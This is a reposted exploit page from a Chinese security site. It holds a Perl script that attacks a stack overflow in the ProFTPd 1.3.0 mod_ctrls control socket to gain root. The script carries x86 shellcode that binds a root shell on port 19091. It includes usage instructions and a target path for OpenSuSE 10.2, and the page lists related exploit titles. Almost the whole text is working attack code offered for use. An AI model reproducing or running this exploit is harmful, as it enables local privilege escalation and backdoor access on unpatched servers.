ProFTPd version 1.3.0 mod_ctrls local stack overflow root exploit that binds a s

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

ProFTPd version 1.3.0 mod_ctrls local stack overflow root exploit that binds a s

来源：http://www.devtarget.org/ 作者：Domberg 发布时间：2009-10-13

#!/usr/bin/perl -w
#
# Exploit for the ProFTPd mod_ctrls vulnerability.
# Stack Overflow in function
# int pr_ctrls_recv_request(pr_crls_cl_t *cl)
# unchecked buffer for arguments of the module
#
# connects to the unix domain socket and sends a string
# that is longer than the buffer (char[512]).
#
# Cheers to Alfredo "revenge" Pesoli for the implementation 
# on Ubuntu and Debian Etch
#
# works on OpenSuSE 10.2 on i686
# 
# http://www.devtarget.org
# Michael Domberg
#
# Usage: $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /path/to/local/socket
#
# Example (on OpenSuSE 10.2):
# $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /usr/local/var/proftpd/proftpd.sock
#
###############################
use strict;
use Socket;

# bind on port 19091
my $shell = 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x4a\x93\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

print "[+] Preparing attack string...\n";

my $rsock   = shift;

my $buf = "A"x520; 

use constant TEMPSOCK  => '/tmp/tmp.sock';

$buf = $buf."\0\0\x0a\xff"."AAAAaaaaAAAAaaaa"."\x77\xe7\xff\xff".$shell;
my $l = length($buf);
print "[+] Opening Unix Domain Socket to mod_ctrls \n";

socket (SOCK, PF_UNIX, SOCK_STREAM, 0)  or die "[-] Socket creation failed : $!";
my $rfile = sockaddr_un($rsock);

unlink TEMPSOCK;
my $lfile = sockaddr_un(TEMPSOCK);

bind (SOCK, $lfile) or die "[-] Creation of Unix Domain Socket failed. ($lfile)";
chmod (00700, TEMPSOCK);

connect (SOCK, $rfile) or die "\n [-] Connection to control socket failed.\n\n";

print "[+] Sending attack...\n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buf,0;

close SOCK;

print "\n [+] Attack String sent. Try to connect to Port 19091\n\n";

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告